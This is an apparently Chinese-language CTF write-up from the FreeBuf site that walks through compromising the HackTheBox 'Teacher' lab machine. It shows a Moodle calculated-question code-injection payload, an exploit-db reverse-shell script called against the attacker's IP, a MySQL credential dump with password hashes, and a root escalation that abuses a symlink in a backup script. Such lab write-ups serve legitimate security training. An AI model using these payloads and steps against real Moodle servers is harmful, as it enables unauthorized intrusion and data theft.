freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课
报告 专辑
行业服务
政 府
CNCERT CNNVD
会员体系(甲方) 会员体系(厂商) 产品名录 企业空间
知识大陆

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

[Meachines] [Easy] Teacher Moodle CMS RCE+Backup.sh->ln软连接滥用权限提升
[Meachines] [Easy] Teacher Moodle CMS RCE+Backup.sh->ln软连接滥用权限提升
maptnh 2025-02-27 00:31:22 15174
所属地 福建省

Information Gathering

IP AddressOpening Ports
10.10.10.153TCP:80

$ ip='10.10.10.153'; itf='tun0'; if nmap -Pn -sn "$ip" | grep -q "Host is up"; then echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m"; ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -n | tr '\n' ',' | sed 's/,$//'); if [ -n "$ports" ]; then echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m"; nmap -Pn -sV -sC -p "$ports" "$ip"; else echo -e "\e[31m[!] No open ports found on $ip.\e[0m"; fi; else echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m"; fi

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
|_http-title: Blackhat highschool
|_http-server-header: Apache/2.4.25 (Debian)

Moodle CMS RCE

http://10.10.10.153/moodle/

image.png

在此位置少了一张图片显示

image-1.png

https://github.com/MartinxMax/ImageToAscii

油猴插件查看图片内容

image-2.png

Hi Servicedesk,..I forgot the last charachter of my password. The only part I remembered is Th4C00lTheacha...Could you guys figure out what the last charachter is, or just reset it?..Thanks,.Giovanni.

# echo '10.10.10.153 teacher.htb'>>/etc/hosts

http://teacher.htb/moodle/

image-3.png

image-4.png

image-5.png

Username:giovanni
Password:Th4C00lTheacha#

image-6.png

http://teacher.htb/moodle/course/view.php?id=2

添加Quiz

image-7.png

新建关于计算的新问题

image-12.png

/*{a*/$_GET[shell];//{x}}

image-13.png

http://teacher.htb/moodle/question/question.php?qtype=calculated&category=2&cmid=9&courseid=2&returnurl=%2Fmod%2Fquiz%2Fedit.php%3Fcmid%3D9%26addonpage%3D0&appendqnumstring=addquestion&id=6&shell=(date;ping%20-c%201%2010.10.16.33)

image-14.png

https://www.exploit-db.com/exploits/46551

$ php exp.php url=http://teacher.htb/moodle user=giovanni pass=Th4C00lTheacha# ip=10.10.16.33 port=443 course=1 course=2

image-15.png

Laternal Movement via mysql hash crack

image-16.png

username:root
password:Welkom1!

$ mysqldump -u 'root' -p -h 'localhost' 'moodle' > /tmp/res.txt

image-17.png

| guest       | $2y$10$ywuE5gDlAlaCu9R0w7pKW.UCB0jUH6ZVKcitP3gMtUNrAebiGMOdO |
| admin       | $2y$10$7VPsdU9/9y2J4Mynlt6vM.a4coqHRXsNTOq/1aA6wCWTsF2wtrDO2 |
| giovanni    | $2y$10$38V6kI7LNudORa7lBAT0q.vsQsv4PemY7rf/M1Zkj/i1VqLO0FSYO |
| Giovannibak | 7a860966115182402ed06375cf0a22af

image-18.png

password:expelled

image-19.png

User.txt

2ed3dfa090a2c381f63965b415be749b

Privilege Escalation:Backup.sh && ln abuse bypass

Pspy监控

image-20.png

image-21.png
image-22.png

通过创建courses软连接,使sh脚本读取备份courses(软连接)->/root下内容

$ rm -rf ~/work/tmp/courses/

$ mv ~/work/courses ~/work/courses.bak

$ ln -s /root ~/work/courses

image-23.png

Root.txt

d27323046410b2d338961ff01b2aaadf

# web安全 # CTF
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 maptnh 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
HackTheBox
相关推荐
[Meachines] [Easy] Haystack Elasticsearch cat API+TRP00F权限提升+Kibana LFI+Logstash权限提升 原创
[Meachines] [Easy] Haystack Elasticsearch cat API+TRP00F权限提升+Kibana LFI+Logstash权限提升

Web安全

#Elasticsearch cat API #TRP00F权限提升 #Kibana LFI #Logstash权限提升

maptnh

18409围观 2025-03-02

[Meachines] [Easy] Keeper Request Tracker (RT)+KeePass进程残留主密钥泄露+PUTTY-PPK转id_rsa私钥权限提升 原创
[Meachines] [Easy] Keeper Request Tracker (RT)+KeePass进程残留主密钥泄露+PUTTY-PPK转id_rsa私钥权限提升

Web安全

#Request Tracker (RT) #KeePass进程残留主密钥泄露 #PUTTY-PPK转id_rsa私钥权限提升

maptnh

16695围观 2025-03-01

[Meachines] [Easy] Armageddon Drupal 7 RCE+TRP00F权限提升+Snap dirty_sock权限提升 原创
[Meachines] [Easy] Armageddon Drupal 7 RCE+TRP00F权限提升+Snap dirty_sock权限提升

Web安全

#Drupal 7 RCE #TRP00F权限提升 #Snap dirty_sock权限提升

maptnh

12956围观 2025-03-01

[Meachines] [Easy] RedPanda SSTI+Java逆向分析+XXE实体注入 原创
[Meachines] [Easy] RedPanda SSTI+Java逆向分析+XXE实体注入

Web安全

#SSTI #Java逆向分析 #XXE实体注入

maptnh

14547围观 2025-03-01

[Meachines] [Easy] TraceBack Webshell枚举+luvit横向+MOTD权限提升 原创
[Meachines] [Easy] TraceBack Webshell枚举+luvit横向+MOTD权限提升

Web安全

#Webshell枚举 #luvit横向 #MOTD权限提升

maptnh

13621围观 2025-03-01

maptnh LV.9
Ценность жизни выше, чем кража данных.
  • 342 文章数
  • 63 关注者
[CISSP] [7] PKI和密码应用
2025-04-03
[CISSP] [6] 密码学和对称密钥算法
2025-04-03
[CISSP] [5] 保护资产安全
2025-04-02
文章目录
User.txt
    Root.txt